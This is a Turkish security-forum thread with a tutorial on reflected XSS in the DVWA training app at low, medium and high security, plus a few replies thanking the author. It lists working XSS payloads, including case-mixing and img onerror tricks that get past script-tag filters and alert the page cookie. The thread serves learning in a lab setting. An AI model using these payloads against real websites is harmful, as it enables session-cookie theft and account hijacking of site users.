THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

#DVWA XSS Reflected Low, Medium, High Security (boybox)

P1NK P4NTH3R - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2018
Nereden:
ABD
Mesajlar:
52
Konular:
5
Teşekkür (Etti):
17
Teşekkür (Aldı):
14
Ticaret:
(0) %
31-10-2018 02:48
#1
#DVWA XSS Reflected Low, Medium, High Security (boybox)
Merhaba Arkadaşlar Reflected(Yansımasız) XSS saldırıları, kalıcı olmayan saldırılar olarak da bilinir, kötü amaçlı bir betik, bir web uygulamasından kurbanın tarayıcısına yansıtıldığında ortaya çıkar.
DVWA üzerinden Sizlere bu saldırıyı nasıl yapıcagınızı gösterdim.



Bazı yazıların " ** " şeklinde çıkmasından dolayı pasted . co ya upload ettim. buradan kodları düzgün görebilirsiniz.
Kod:
http://pasted.co/289532f7
Kullanılan Kodlar:
Kod:
----*low----
<h1>Boybox</h1>
<font color="BLACK"> Boybox </font>
<script>alert("Boyboxx THT Deneme")</script>
<script>alert(********.cookie);</script>
 
 
 ---*Medium----
<SCRIPT>alert("Boyboxx THT Deneme")</SCRIPT>
<SCRIPT>alert(********.cookie);</SCRIPT>
<sCrIpT>alert("Boyboxx THT Deneme")</sCrIpT>
<ScRiPt>alert(********.cookie);</ScRiPt>
'<script>' bu kelimeyi yasaklamışlar bizde farklı yazıcaz.
<script> bu şekilde yazmayı yasakladıklarından bizde büyük ve büyüklü küçüklü yazdık.

-----*High---
<script>alert("Boyboxx THT Deneme")</script>
<SCRIPT>alert("Boyboxx THT Deneme")</SCRIPT>
<sCrIpT>alert("Boyboxx THT Deneme")</sCrIpT>
<ScRiPt>alert(********.cookie);</ScRiPt>

ilk 2 seviyede denediklerimiz denedik fakat sonuç alamadık o zaman kodlara bakmamız gerekiyor.
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); 
( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '',  buradaki harfleri ard ard'a geldiginde yazdıgımızı gecersiz saymaktadır.

<img src=x onError=alert("Boyboxx THT Deneme")>


<img src=nosource onerror=alert(********.cookie)>
<body onload=alert(********.cookie)>
DVWA serisinin devamı gelicektir. bir sonraki video XSS (Stored) 'dur.
İyi geceler

Konu P1NK P4NTH3R tarafından (31-10-2018 13:40 Saat 13:40 ) değiştirilmiştir. Sebep: ** şeklinde çıkan yazıladan dolayı.
R4V3N - ait Kullanıcı Resmi (Avatar)
Çevirmen
Üyelik tarihi:
07/2016
Nereden:
Cræzy
Yaş:
22
Mesajlar:
6.174
Konular:
349
Teşekkür (Etti):
808
Teşekkür (Aldı):
2333
Ticaret:
(0) %
31-10-2018 08:05
#2
Emeğine sağlık güzel çalışma olmuş. Kodları keşke pasted.co gibi bir yerden paylaşsaydın, burada hep ** çıkmış.
---------------------
You only live once, don't let it go to waste
Telegram
Twitter

P1NK P4NTH3R - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2018
Nereden:
ABD
Mesajlar:
52
Konular:
5
Teşekkür (Etti):
17
Teşekkür (Aldı):
14
Ticaret:
(0) %
31-10-2018 13:40
#3
Alıntı:
R4V3N´isimli üyeden Alıntı Mesajı göster
Emeğine sağlık güzel çalışma olmuş. Kodları keşke pasted.co gibi bir yerden paylaşsaydın, burada hep ** çıkmış.
Öneriniz için teşekkür ederim pasted.co ya upload edildi. ve link paylaşıldı.
ForceNN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2018
Nereden:
Texas
Mesajlar:
186
Konular:
19
Teşekkür (Etti):
2
Teşekkür (Aldı):
7
Ticaret:
(0) %
31-10-2018 13:49
#4
Emeğine eline sağlık...

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler